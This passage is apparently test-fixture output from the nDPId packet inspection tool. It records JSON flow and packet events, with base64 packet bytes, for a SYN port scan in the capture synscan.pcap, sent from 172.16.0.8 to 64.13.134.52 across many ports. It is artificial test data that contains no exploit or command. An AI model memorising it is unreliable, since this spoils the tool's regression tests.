-00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"synscan.pcap","alias":"nDPId-test","flow_id":644,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsfjcAADIGmDusEAAIQA2GNIzTA\/HdU4MZAAAAAGACDAAomwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1455,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"synscan.pcap","alias":"nDPId-test","flow_id":645,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsIUEAADsG7DGsEAAIQA2GNIzTBa\/dU4MZAAAAAGACEAAi3QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9091,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"synscan.pcap","alias":"nDPId-test","flow_id":646,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsIGkAADsG7QmsEAAIQA2GNIzTI4PdU4MZAAAAAGACEAAFCQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1216,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"synscan.pcap","alias":"nDPId-test","flow_id":647,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAs8WwAADAGJwasEAAIQA2GNIzTBMDdU4MZAAAAAGACBAAvzAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2126,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"synscan.pcap","alias":"nDPId-test","flow_id":648,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAs4isAADYGMEesEAAIQA2GNIzTCE7dU4MZAAAAAGACDAAkPgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1277,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"synscan.pcap","alias":"nDPId-test","flow_id":649,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsa44AADEGq+SsEAAIQA2GNIzTBP3dU4MZAAAAAGACCAArjwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":659,"source":"synscan.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAse3cAADIGmvusEAAIQA2GNIzTF2TdU4MZAAAAAGACDAAVKAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1058,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":660,"source":"synscan.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsdjUAADcGmz2sEAAIQA2GNIzTBCLdU4MZAAAAAGACEAAkagAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1248,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":661,"source":"synscan.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsodUAADUGcZ2sEAAIQA2GNIzTBODdU4MZAAAAAGACCAArrAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":662,"source":"synscan.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsNa8AAC4G5MOsEAAIQA2GNIzTIzHdU4MZAAAAAGACDAAJWwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1185,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"synscan.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsa+sAACoGsoesEAAIQA2GNIzTBKHdU4MZAAAAAGACDAAn6wAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65129,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"synscan.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsTKAAADUGxtKsEAAIQA2GNIzT\/mndU4MZAAAAAGACCAAyIgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059518,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059518,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":212,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"synscan.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1278275059518,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059518,"pkt":"ACYLMQczACWzv5HuCABFAAAsqL8AADQGa7OsEAAIQA2GNIzTANTdU4MZAAAAAGACBAAzuAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1096,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"synscan.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsh6AAAC8GkdKsEAAIQA2GNIzTBEjdU4MZAAAAAGACEAAkRAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"synscan.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsYFoAACoGvhisEAAIQA2GNIzTHVjdU4MZAAAAAGACDAAPNAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5850,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":668,"source":"synscan.pcap","alias":"nDPId-test","flow_id":659,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsNFoAACYG7hisEAAIQA2GNIzTFtrdU4MZAAAAAGACDAAVsgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2121,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"synscan.pcap","alias":"nDPId-test","flow_id":660,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAshW4AADgGiwSsEAAIQA2GNIzTCEndU4MZAAAAAGACBAAsQwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2196,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":670,"source":"synscan.pcap","alias":"nDPId-test","flow_id":661,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsT2wAACwGzQasEAAIQA2GNIzTCJTdU4MZAAAAAGACBAAr+AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3367,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":671,"source":"synscan.pcap","alias":"nDPId-test","flow_id":662,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsQX8AAC0G2fOsEAAIQA2GNIzTDSfdU4MZAAAAAGACCAAjZQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":672,"source":"synscan.pcap","alias":"nDPId-test","flow_id":663,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsGTIAADgG90CsEAAIQA2GNIzTIyvdU4MZAAAAAGACBAARYQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1201,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":673,"source":"synscan.pcap","alias":"nDPId-test","flow_id":664,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsw2sAADAGVQesEAAIQA2GNIzTBLHdU4MZAAAAAGACBAAv2wAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059521,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059521,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":34572,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"synscan.pcap","alias":"nDPId-test","flow_id":665,"flow_packet_id":1,"flow_last_seen":1278275059521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059521,"pkt":"ACYLMQczACWzv5HuCABFAAAsKsAAAC0G8LKsEAAIQA2GNIzThwzdU4MZAAAAAGACCACpfwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":888,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"synscan.pcap","alias":"nDPId-test","flow_id":666,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAstssAADcGWqesEAAIQA2GNIzTA3jdU4MZAAAAAGACEAAlFAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"synscan.pcap","alias":"nDPId-test","flow_id":667,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAsbZkAACgGstmsEAAIQA2GNIzTIAjdU4MZAAAAAGACBAAUhAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059522,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059522,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2047,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":677,"source":"synscan.pcap","alias":"nDPId-test","flow_id":668,"flow_packet_id":1,"flow_last_seen":1278275059522,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059522,"pkt":"ACYLMQczACWzv5HuCABFAAAs9XgAADsGF\/qsEAAIQA2GNIzTB\/\/dU4MZAAAAAGACEAAgjQAAAgQFtA=="} 